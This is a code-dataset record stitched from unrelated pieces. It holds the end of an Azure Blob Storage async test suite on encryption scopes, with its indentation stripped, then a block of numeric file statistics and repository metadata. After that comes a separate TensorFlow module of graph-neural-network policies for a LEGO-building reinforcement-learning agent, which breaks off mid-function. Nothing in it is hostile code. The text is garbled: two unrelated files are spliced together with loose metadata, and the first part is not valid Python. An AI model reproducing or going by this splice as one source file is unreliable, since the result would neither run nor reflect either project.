blob_client = bsc.get_blob_client(self.container_name, self._get_blob_reference())
page_blob_prop = await blob_client.upload_blob(self.byte_data,
blob_type=BlobType.PageBlob,
max_concurrency=2,
encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(page_blob_prop['etag'])
self.assertIsNotNone(page_blob_prop['last_modified'])
self.assertTrue(page_blob_prop['request_server_encrypted'])
self.assertEqual(page_blob_prop['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
# Act get the blob content
blob = await blob_client.download_blob()
# Assert content was retrieved with the cpk
self.assertEqual(await blob.readall(), self.byte_data)
self.assertEqual(blob.properties.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_get_set_blob_metadata(self, resource_group, location, storage_account, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
blob_client, _ = await self._create_block_blob(bsc, data=b'AAABBBCCC', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act
blob_props = await blob_client.get_blob_properties()
# Assert
self.assertTrue(blob_props.server_encrypted)
self.assertEqual(blob_props.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
# Act set blob properties
metadata = {'hello': 'world', 'number': '42', 'up': 'upval'}
with self.assertRaises(HttpResponseError):
await blob_client.set_blob_metadata(
metadata=metadata,
)
await blob_client.set_blob_metadata(metadata=metadata, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
blob_props = await blob_client.get_blob_properties()
md = blob_props.metadata
self.assertEqual(3, len(md))
self.assertEqual(md['hello'], 'world')
self.assertEqual(md['number'], '42')
self.assertEqual(md['up'], 'upval')
self.assertFalse('Up' in md)
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_snapshot_blob(self, resource_group, location, storage_account, storage_account_key):
# Arrange
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
storage_account_key,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024,
transport=AiohttpTestTransport(connection_data_block_size=1024))
await self._setup(bsc)
blob_client, _ = await self._create_block_blob(bsc, data=b'AAABBBCCC', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Act without cpk should not work
with self.assertRaises(HttpResponseError):
await blob_client.create_snapshot()
# Act with cpk should work
blob_snapshot = await blob_client.create_snapshot(encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Assert
self.assertIsNotNone(blob_snapshot)
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_list_blobs(self, resource_group, location, storage_account, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
await self._setup(bsc)
blob_client, _ = await self._create_block_blob(bsc, blob_name="blockblob", data=b'AAABBBCCC', encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
await self._create_append_blob(bsc, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
container_client = bsc.get_container_client(self.container_name)
generator = container_client.list_blobs(include="metadata")
async for blob in generator:
self.assertIsNotNone(blob)
# Assert: every listed blob has encryption_scope
self.assertEqual(blob.encryption_scope, TEST_ENCRYPTION_KEY_SCOPE)
self._teardown(bsc)
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_create_container_with_default_cpk_n(self, resource_group, location, storage_account,
storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
container_client = await bsc.create_container(
'asynccpkcontainer',
container_encryption_scope=TEST_CONTAINER_ENCRYPTION_KEY_SCOPE)
container_props = await container_client.get_container_properties()
self.assertEqual(
container_props.encryption_scope.default_encryption_scope,
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
self.assertEqual(container_props.encryption_scope.prevent_encryption_scope_override, False)
async for container in bsc.list_containers(name_starts_with='asynccpkcontainer'):
self.assertEqual(
container_props.encryption_scope.default_encryption_scope,
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
self.assertEqual(container_props.encryption_scope.prevent_encryption_scope_override, False)
blob_client = container_client.get_blob_client("appendblob")
# providing encryption scope when upload the blob
resp = await blob_client.upload_blob(b'aaaa', BlobType.AppendBlob, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Use the provided encryption scope on the blob
self.assertEqual(resp['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
await container_client.delete_container()
@pytest.mark.playback_test_only
@GlobalStorageAccountPreparer()
@AsyncStorageTestCase.await_prepared_test
async def test_create_container_with_default_cpk_n_deny_override(self, resource_group, location, storage_account,
storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
container_client = await bsc.create_container(
'asyncdenyoverridecpkcontainer',
container_encryption_scope=TEST_CONTAINER_ENCRYPTION_KEY_SCOPE_DENY_OVERRIDE
)
container_props = await container_client.get_container_properties()
self.assertEqual(
container_props.encryption_scope.default_encryption_scope,
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
self.assertEqual(container_props.encryption_scope.prevent_encryption_scope_override, True)
async for container in bsc.list_containers(name_starts_with='asyncdenyoverridecpkcontainer'):
self.assertEqual(
container_props.encryption_scope.default_encryption_scope,
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
self.assertEqual(container_props.encryption_scope.prevent_encryption_scope_override, True)
blob_client = container_client.get_blob_client("appendblob")
# It's not allowed to set encryption scope on the blob when the container denies encryption scope override.
with self.assertRaises(HttpResponseError):
await blob_client.upload_blob(b'aaaa', BlobType.AppendBlob, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
resp = await blob_client.upload_blob(b'aaaa', BlobType.AppendBlob)
self.assertEqual(resp['encryption_scope'], TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
await container_client.delete_container()
| 48.746667
| 145
| 0.678993
| 4,110
| 36,560
| 5.677129
| 0.07129
| 0.062358
| 0.050144
| 0.052801
| 0.858312
| 0.843741
| 0.831998
| 0.813226
| 0.790683
| 0.771825
| 0
| 0.014709
| 0.241302
| 36,560
| 749
| 146
| 48.811749
| 0.826484
| 0.11198
| 0
| 0.737736
| 0
| 0
| 0.038647
| 0.011718
| 0
| 0
| 0
| 0
| 0.192453
| 1
| 0.003774
| false
| 0.001887
| 0.018868
| 0.001887
| 0.037736
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0ab7308e720e0536a0d4fbb99d86f33047e19b51
| 49,357
|
py
|
Python
|
src/baselines/common/lego_policies_artificial_mask_pretrain.py
|
POSTECH-CVLab/Brick-by-Brick
|
b000f98f04c17d6f59bb4f0144b997583c479e2a
|
[
"MIT"
] | 3
|
2022-01-23T14:14:36.000Z
|
2022-02-21T14:41:31.000Z
|
src/baselines/common/lego_policies_artificial_mask_pretrain.py
|
POSTECH-CVLab/Brick-by-Brick
|
b000f98f04c17d6f59bb4f0144b997583c479e2a
|
[
"MIT"
] | null | null | null |
src/baselines/common/lego_policies_artificial_mask_pretrain.py
|
POSTECH-CVLab/Brick-by-Brick
|
b000f98f04c17d6f59bb4f0144b997583c479e2a
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
from baselines.a2c.utils import fc, fc_relu, conv, ortho_init, fc_sigmoid
from baselines.common.distributions import make_pdtype
import gym
import numpy as np
class Init_FC(tf.keras.Model):
def __init__(self, hidden_dim=64, init_dim = 4, target_dim = 192, layer_type=0, layer_num=0):
super(Init_FC, self).__init__()
self.fc0 = fc_relu(init_dim + target_dim, 'init_{}_fc0_{}'.format(layer_type, layer_num), hidden_dim, init_scale=np.sqrt(2))
self.fc1 = fc_relu(hidden_dim + target_dim, 'init_{}_fc1_{}'.format(layer_type, layer_num), hidden_dim, init_scale=np.sqrt(2))
# self.fc2 = fc_relu(hidden_dim + target_dim, 'init_{}_fc2_{}'.format(layer_type, layer_num), hidden_dim, init_scale=np.sqrt(2))
self.fc2 = fc(hidden_dim + target_dim, 'init_{}_fc2_{}'.format(layer_type, layer_num), hidden_dim, init_scale=np.sqrt(2))
def call(self, init_feature, target_feature):
inputs = init_feature
x = self.fc0(tf.concat([init_feature, target_feature], axis=-1))
x = self.fc1(tf.concat([x, target_feature], axis=-1))
x = self.fc2(tf.concat([x, target_feature], axis=-1))
return x
class Init_FC_No_Target(tf.keras.Model):
def __init__(self, hidden_dim=64, init_dim = 4, layer_type=0, layer_num=0):
super(Init_FC_No_Target, self).__init__()
self.fc0 = fc_relu(init_dim, 'init_{}_fc0_{}'.format(layer_type, layer_num), hidden_dim, init_scale=np.sqrt(2))
self.fc1 = fc_relu(hidden_dim, 'init_{}_fc1_{}'.format(layer_type, layer_num), hidden_dim, init_scale=np.sqrt(2))
self.fc2 = fc_relu(hidden_dim, 'init_{}_fc2_{}'.format(layer_type, layer_num), hidden_dim, init_scale=np.sqrt(2))
def call(self, init_feature):
x = self.fc0(init_feature)
x = self.fc1(x)
x = self.fc2(x)
return x
class Lego_Message_Passing_Artificial(tf.keras.Model):
def __init__(self, policy_network=None, hidden_dim=64, node_dim = 4, target_info_dim=4, edge_dim=4, layer_num=0):
super(Lego_Message_Passing_Artificial, self).__init__()
# self.message_fc = policy_network or fc_relu(hidden_dim + hidden_dim + edge_dim, 'msg_fc_{}'.format(int(layer_num)),
# hidden_dim, init_scale=np.sqrt(2))
# self.feature_fc = fc_relu(hidden_dim + node_dim + target_info_dim, 'feat_fc_{}'.format(int(layer_num)), hidden_dim, init_scale=np.sqrt(2))
self.feature_fc = fc_relu(hidden_dim + node_dim, 'feat_fc_{}'.format(int(layer_num)), hidden_dim, init_scale=np.sqrt(2))
# self.edge_fc = fc_relu(node_dim + node_dim + edge_dim + target_info_dim, 'edge_fc_{}'.format(int(layer_num)), hidden_dim, init_scale=np.sqrt(2))
self.edge_fc = fc_relu(node_dim + node_dim + edge_dim, 'edge_fc_{}'.format(int(layer_num)), hidden_dim, init_scale=np.sqrt(2))
def call(self, node_feature, adjacency, target_information, edge_feature, node_mask, training=True):
tiled_node_feature = tf.tile(tf.expand_dims(node_feature, axis=1), (1, node_feature.shape[1], 1, 1))
node_node_feature = tf.concat((tf.transpose(tiled_node_feature, (0, 2, 1, 3)), tiled_node_feature), axis=-1)
# edge_feature = self.edge_fc(tf.concat((node_node_feature, edge_feature, two_tiled_target_information), axis=-1))
edge_feature = self.edge_fc(tf.concat((node_node_feature, edge_feature), axis=-1))
# message = tf.reduce_sum(tf.math.multiply(self.message_fc(tf.concat((node_node_feature, edge_feature), axis=-1)), adjacency[..., None]), axis=2)
message = tf.reduce_sum(tf.math.multiply(edge_feature, adjacency[..., None]), axis=2)
'''Shape : (num_envs, max_node, hidden_dim)'''
# ending_feature = self.feature_fc(tf.concat([message, node_feature, tiled_target_information], axis=-1))
ending_feature = self.feature_fc(tf.concat([message, node_feature], axis=-1))
target_feature = target_information
return ending_feature, edge_feature, target_feature
class PolicyWithValue_Lego_Artificial(tf.Module):
"""
Encapsulates fields and methods for RL policy and value function estimation with shared parameters
"""
def __init__(self, ac_space, policy_network, target_network, hidden_dim, target_hidden_dim, value_network=None, estimate_q=False):
"""
Parameters:
----------
ac_space action space
policy_network keras network for policy
value_network keras network for value
estimate_q q value or v value
"""
self.estimate_q = estimate_q
self.initial_state = None
self.target_network = target_network
# hidden_dim = 64
reshaped_hidden_dim = hidden_dim * 3
target_init_dim = 3
# target_hidden_dim = 64 * 3
reshaped_target_hidden_dim = target_hidden_dim * 3
edge_init_dim = 4
self.init_node_fc = Init_FC(layer_type=0, hidden_dim=reshaped_hidden_dim, target_dim=reshaped_target_hidden_dim)
self.init_edge_fc = Init_FC(layer_type=1, hidden_dim=reshaped_hidden_dim, target_dim=reshaped_target_hidden_dim)
# self.gcn_init = Lego_Message_Passing_Artificial(policy_network, node_dim=hidden_dim, hidden_dim=hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=hidden_dim, layer_num=1)
self.gcn_init = Lego_Message_Passing_Artificial(policy_network, node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=1)
self.gcn_block = []
for i in range(2):
# temp_gcn = Lego_Message_Passing_Artificial(node_dim=hidden_dim, hidden_dim=hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=hidden_dim, layer_num=i+2)
temp_gcn = Lego_Message_Passing_Artificial(node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=i+2)
self.gcn_block.append(temp_gcn)
self.pivot_classifier = fc(reshaped_hidden_dim + reshaped_target_hidden_dim, 'piv', 1, init_scale=np.sqrt(2))
# Based on the action space, will select what probability distribution type
self.pdtype = make_pdtype((None, reshaped_hidden_dim + reshaped_target_hidden_dim), ac_space, init_scale=np.sqrt(2))
if estimate_q:
assert isinstance(ac_space, gym.spaces.Discrete)
self.value_fc = fc(hidden_dim, 'q', ac_space.n, init_scale=np.sqrt(2))
else:
self.value_fc = fc(reshaped_hidden_dim + reshaped_target_hidden_dim, 'vf', 1, init_scale=np.sqrt(2))
@tf.function
def step(self, observation, pivot_mask, offset_mask, training=True):
"""
Compute next action(s) given the observation(s)
Parameters:
----------
observation batched observation data
Returns:
-------
(action, value estimate, next state, negative log likelihood of the action under current policy parameters) tuple
"""
node_feature, adjacency, node_mask, target_information, edge_feature = \
tuple([observation.get(key) for key in ['node_attributes', 'adjacency', 'node_mask', 'target_information', 'edge_attributes']])
reshaped_target_information = tf.reshape(target_information, [target_information.shape[0] * target_information.shape[1], *target_information.shape[2:]])
# target_information = self.target_network(target_information)
raw_target_information = self.target_network(reshaped_target_information)
reshaped_target_information = tf.reshape(raw_target_information, [target_information.shape[0], -1])
tiled_target_information = tf.tile(tf.expand_dims(reshaped_target_information, axis=1), (1, node_feature.shape[1], 1))
node_feature = self.init_node_fc(node_feature, tiled_target_information)
two_tiled_target_information = tf.tile(tf.expand_dims(tiled_target_information, axis=1), (1, edge_feature.shape[1], 1, 1))
edge_feature = self.init_edge_fc(edge_feature, two_tiled_target_information)
node_feature, edge_feature, reshaped_target_information = self.gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
node_feature, edge_feature, reshaped_target_information = self.gcn_block[i](node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
global_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
# global_graph_feature = tf.reduce_sum(tf.multiply(node_feature, node_mask), axis = 1)
for_pivot_node_logits = tf.squeeze(self.pivot_classifier(tf.concat([node_feature, tiled_target_information], axis=-1)), axis=2)
squeezed_node_mask = tf.squeeze(node_mask, axis=-1)
squeezed_pivot_mask = tf.cast(tf.math.multiply(tf.squeeze(pivot_mask, axis=-1), squeezed_node_mask), tf.float32)
negative_node_mask = tf.cast((tf.ones_like(squeezed_node_mask) - squeezed_node_mask), dtype=for_pivot_node_logits.dtype) * float(-1e8)
negative_pivot_mask = tf.cast((tf.ones_like(squeezed_pivot_mask) - squeezed_pivot_mask), dtype=for_pivot_node_logits.dtype) * float(-1e8)
masked_for_pivot_node_logits = for_pivot_node_logits + negative_pivot_mask
pivot_node_index = tf.random.categorical(masked_for_pivot_node_logits, 1)
pivot_cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE)
pivot_probs = tf.nn.softmax(masked_for_pivot_node_logits, axis=-1)
pivot_neglogp = pivot_cce(y_true=tf.one_hot(pivot_node_index, for_pivot_node_logits.shape[-1]), y_pred=pivot_probs)
node_latent_representation = []
for i in range(node_feature.shape[0]):
node_latent_representation.append(node_feature[i][tf.squeeze(pivot_node_index)[i]])
'''Shape : (num_envs, hidden_dim)'''
node_latent_representation = tf.stack(node_latent_representation)
per_pivot_available_actions = []
for i in range(node_feature.shape[0]):
per_pivot_available_actions.append(offset_mask[i][tf.squeeze(pivot_node_index)[i]])
per_pivot_available_actions = tf.stack(per_pivot_available_actions)
pd, pi = self.pdtype.pdfromlatent(tf.concat([node_latent_representation, reshaped_target_information], axis=-1))
negative_logits_mask = (tf.ones_like(per_pivot_available_actions) - per_pivot_available_actions) * int(-1e8)
masked_action_logits = pi + tf.cast(negative_logits_mask, pi.dtype)
action = tf.random.categorical(masked_action_logits, 1)
cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE)
probs = tf.nn.softmax(masked_action_logits, axis=-1)
neglogp = cce(y_true=tf.one_hot(action, pi.shape[-1]), y_pred=probs)
vf = tf.squeeze(self.value_fc(tf.concat([global_graph_feature, reshaped_target_information], axis=-1)), axis=1)
return tf.cast(action, dtype=tf.int32), vf, None, neglogp, pivot_neglogp, tf.cast(pivot_node_index, dtype=tf.int32)
@tf.function
def value(self, observation):
"""
Compute value estimate(s) given the observation(s)
Parameters:
----------
observation observation data (either single or a batch)
Returns:
-------
value estimate
"""
node_feature, adjacency, available_actions, node_mask, target_information, edge_feature = \
tuple([observation.get(key) for key in ['node_attributes', 'adjacency', 'available_actions', 'node_mask', 'target_information', 'edge_attributes']])
reshaped_target_information = tf.reshape(target_information, [target_information.shape[0] * target_information.shape[1], *target_information.shape[2:]])
# target_information = self.target_network(target_information)
raw_target_information = self.target_network(reshaped_target_information)
reshaped_target_information = tf.reshape(raw_target_information, [target_information.shape[0], -1])
tiled_target_information = tf.tile(tf.expand_dims(reshaped_target_information, axis=1), (1, node_feature.shape[1], 1))
node_feature = self.init_node_fc(node_feature, tiled_target_information)
two_tiled_target_information = tf.tile(tf.expand_dims(tiled_target_information, axis=1), (1, edge_feature.shape[1], 1, 1))
edge_feature = self.init_edge_fc(edge_feature, two_tiled_target_information)
node_feature, edge_feature, reshaped_target_information = self.gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
node_feature, edge_feature, reshaped_target_information = self.gcn_block[i](node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
global_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
# global_graph_feature = tf.reduce_sum(tf.multiply(node_feature, node_mask), axis = 1)
result = tf.squeeze(self.value_fc(tf.concat([global_graph_feature, reshaped_target_information], axis=-1)), axis=1)
return result
class Lego_Message_Passing_Artificial_MultiGNN(tf.keras.Model):
def __init__(self, policy_network=None, hidden_dim=64, node_dim = 4, target_info_dim=4, edge_dim=4, layer_num=0):
super(Lego_Message_Passing_Artificial_MultiGNN, self).__init__()
# self.feature_fc = fc_relu(hidden_dim + node_dim + target_info_dim, 'feat_fc_{}'.format(int(layer_num)), hidden_dim, init_scale=np.sqrt(2))
self.feature_fc = fc_relu(hidden_dim + node_dim, 'feat_fc_{}'.format(int(layer_num)), hidden_dim, init_scale=np.sqrt(2))
# self.edge_fc = fc_relu(node_dim + node_dim + edge_dim + target_info_dim, 'edge_fc_{}'.format(int(layer_num)), hidden_dim, init_scale=np.sqrt(2))
self.edge_fc = fc_relu(node_dim + node_dim + edge_dim, 'edge_fc_{}'.format(int(layer_num)), hidden_dim, init_scale=np.sqrt(2))
def call(self, node_feature, adjacency, target_information, edge_feature, node_mask, training=True):
tiled_node_feature = tf.tile(tf.expand_dims(node_feature, axis=1), (1, node_feature.shape[1], 1, 1))
node_node_feature = tf.concat((tf.transpose(tiled_node_feature, (0, 2, 1, 3)), tiled_node_feature), axis=-1)
# edge_feature = self.edge_fc(tf.concat((node_node_feature, edge_feature, two_tiled_target_information), axis=-1))
edge_feature = self.edge_fc(tf.concat((node_node_feature, edge_feature), axis=-1))
# message = tf.reduce_sum(tf.math.multiply(self.message_fc(tf.concat((node_node_feature, edge_feature), axis=-1)), adjacency[..., None]), axis=2)
message = tf.reduce_sum(tf.math.multiply(edge_feature, adjacency[..., None]), axis=2)
'''Shape : (num_envs, max_node, hidden_dim)'''
# ending_feature = self.feature_fc(tf.concat([message, node_feature, tiled_target_information], axis=-1))
ending_feature = self.feature_fc(tf.concat([message, node_feature], axis=-1))
return ending_feature, edge_feature
class PolicyWithValue_Lego_Artificial_MultiGNN(tf.Module):
"""
Encapsulates fields and methods for RL policy and value function estimation with shared parameters
"""
def __init__(self, ac_space, policy_network, target_network, hidden_dim, target_hidden_dim, value_network=None, estimate_q=False):
"""
Parameters:
----------
ac_space action space
policy_network keras network for policy
value_network keras network for value
estimate_q q value or v value
"""
self.estimate_q = estimate_q
self.initial_state = None
self.target_network = target_network
# hidden_dim = 64
reshaped_hidden_dim = hidden_dim * 3
target_init_dim = 3
# target_hidden_dim = 64 * 3
reshaped_target_hidden_dim = target_hidden_dim * 3
edge_init_dim = 4
self.init_node_fc = Init_FC(layer_type=0, hidden_dim=reshaped_hidden_dim, target_dim=reshaped_target_hidden_dim)
self.init_edge_fc = Init_FC(layer_type=1, hidden_dim=reshaped_hidden_dim, target_dim=reshaped_target_hidden_dim)
self.gcn_init = Lego_Message_Passing_Artificial_MultiGNN(policy_network, node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=1)
self.gcn_block = []
for i in range(2):
temp_gcn = Lego_Message_Passing_Artificial_MultiGNN(node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=i+2)
self.gcn_block.append(temp_gcn)
self.pivot_gcn_init = Lego_Message_Passing_Artificial_MultiGNN(policy_network=None, node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=1)
self.pivot_gcn_block = []
for i in range(2):
temp_gcn = Lego_Message_Passing_Artificial_MultiGNN(node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=i+2)
self.pivot_gcn_block.append(temp_gcn)
self.pivot_classifier = fc(reshaped_hidden_dim + reshaped_target_hidden_dim, 'piv', 1, init_scale=np.sqrt(2))
# Based on the action space, will select what probability distribution type
self.pdtype = make_pdtype((None, reshaped_hidden_dim + reshaped_target_hidden_dim), ac_space, init_scale=np.sqrt(2))
if estimate_q:
assert isinstance(ac_space, gym.spaces.Discrete)
self.value_fc = fc(hidden_dim, 'q', ac_space.n, init_scale=np.sqrt(2))
else:
self.value_fc = fc(reshaped_hidden_dim + reshaped_hidden_dim + reshaped_target_hidden_dim, 'vf', 1, init_scale=np.sqrt(2))
@tf.function
def step(self, observation, pivot_mask, offset_mask, training=True):
"""
Compute next action(s) given the observation(s)
Parameters:
----------
observation batched observation data
Returns:
-------
(action, value estimate, next state, negative log likelihood of the action under current policy parameters) tuple
"""
node_feature, adjacency, available_actions, node_mask, target_information, edge_feature = \
tuple([observation.get(key) for key in ['node_attributes', 'adjacency', 'available_actions', 'node_mask', 'target_information', 'edge_attributes']])
reshaped_target_information = tf.reshape(target_information, [target_information.shape[0] * target_information.shape[1], *target_information.shape[2:]])
# target_information = self.target_network(target_information)
raw_target_information = self.target_network(reshaped_target_information)
reshaped_target_information = tf.reshape(raw_target_information, [target_information.shape[0], -1])
tiled_target_information = tf.tile(tf.expand_dims(reshaped_target_information, axis=1), (1, node_feature.shape[1], 1))
node_feature = self.init_node_fc(node_feature, tiled_target_information)
two_tiled_target_information = tf.tile(tf.expand_dims(tiled_target_information, axis=1), (1, edge_feature.shape[1], 1, 1))
edge_feature = self.init_edge_fc(edge_feature, two_tiled_target_information)
action_node_feature, action_edge_feature = self.gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
action_node_feature, action_edge_feature = self.gcn_block[i](action_node_feature, adjacency, reshaped_target_information, action_edge_feature, node_mask)
pivot_node_feature, pivot_edge_feature = self.pivot_gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
pivot_node_feature, pivot_edge_feature = self.pivot_gcn_block[i](pivot_node_feature, adjacency, reshaped_target_information, pivot_edge_feature, node_mask)
action_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(action_node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
# action_graph_feature = tf.reduce_sum(tf.multiply(action_node_feature, node_mask), axis = 1)
pivot_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(pivot_node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
# pivot_graph_feature = tf.reduce_sum(tf.multiply(pivot_node_feature, node_mask), axis = 1)
for_pivot_node_logits = tf.squeeze(self.pivot_classifier(tf.concat([pivot_node_feature, tiled_target_information], axis=-1)), axis=2)
squeezed_node_mask = tf.squeeze(node_mask, axis=-1)
squeezed_pivot_mask = tf.cast(tf.math.multiply(tf.squeeze(pivot_mask, axis=-1), squeezed_node_mask), tf.float32)
negative_node_mask = tf.cast((tf.ones_like(squeezed_node_mask) - squeezed_node_mask), dtype=for_pivot_node_logits.dtype) * float(-1e8)
negative_pivot_mask = tf.cast((tf.ones_like(squeezed_pivot_mask) - squeezed_pivot_mask), dtype=for_pivot_node_logits.dtype) * float(-1e8)
masked_for_pivot_node_logits = for_pivot_node_logits + negative_pivot_mask
pivot_node_index = tf.random.categorical(masked_for_pivot_node_logits, 1)
pivot_cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE)
pivot_probs = tf.nn.softmax(masked_for_pivot_node_logits, axis=-1)
pivot_neglogp = pivot_cce(y_true=tf.one_hot(pivot_node_index, for_pivot_node_logits.shape[-1]), y_pred=pivot_probs)
node_latent_representation = []
for i in range(node_feature.shape[0]):
node_latent_representation.append(action_node_feature[i][tf.squeeze(pivot_node_index)[i]])
'''Shape : (num_envs, hidden_dim)'''
node_latent_representation = tf.stack(node_latent_representation)
per_pivot_available_actions = []
for i in range(node_feature.shape[0]):
per_pivot_available_actions.append(offset_mask[i][tf.squeeze(pivot_node_index)[i]])
per_pivot_available_actions = tf.stack(per_pivot_available_actions)
pd, pi = self.pdtype.pdfromlatent(tf.concat([node_latent_representation, reshaped_target_information], axis=-1))
negative_logits_mask = (tf.ones_like(per_pivot_available_actions) - per_pivot_available_actions) * int(-1e8)
masked_action_logits = pi + tf.cast(negative_logits_mask, pi.dtype)
action = tf.random.categorical(masked_action_logits, 1)
cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE)
probs = tf.nn.softmax(masked_action_logits, axis=-1)
neglogp = cce(y_true=tf.one_hot(action, pi.shape[-1]), y_pred=probs)
vf = tf.squeeze(self.value_fc(tf.concat([action_graph_feature, pivot_graph_feature, reshaped_target_information], axis=-1)), axis=1)
return tf.cast(action, dtype=tf.int32), vf, None, neglogp, pivot_neglogp, tf.cast(pivot_node_index, dtype=tf.int32)
@tf.function
def value(self, observation):
"""
Compute value estimate(s) given the observation(s)
Parameters:
----------
observation observation data (either single or a batch)
Returns:
-------
value estimate
"""
node_feature, adjacency, available_actions, node_mask, target_information, edge_feature = \
tuple([observation.get(key) for key in ['node_attributes', 'adjacency', 'available_actions', 'node_mask', 'target_information', 'edge_attributes']])
reshaped_target_information = tf.reshape(target_information, [target_information.shape[0] * target_information.shape[1], *target_information.shape[2:]])
# target_information = self.target_network(target_information)
raw_target_information = self.target_network(reshaped_target_information)
reshaped_target_information = tf.reshape(raw_target_information, [target_information.shape[0], -1])
tiled_target_information = tf.tile(tf.expand_dims(reshaped_target_information, axis=1), (1, node_feature.shape[1], 1))
node_feature = self.init_node_fc(node_feature, tiled_target_information)
two_tiled_target_information = tf.tile(tf.expand_dims(tiled_target_information, axis=1), (1, edge_feature.shape[1], 1, 1))
edge_feature = self.init_edge_fc(edge_feature, two_tiled_target_information)
action_node_feature, action_edge_feature = self.gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
action_node_feature, action_edge_feature = self.gcn_block[i](action_node_feature, adjacency, reshaped_target_information, action_edge_feature, node_mask)
pivot_node_feature, pivot_edge_feature = self.pivot_gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
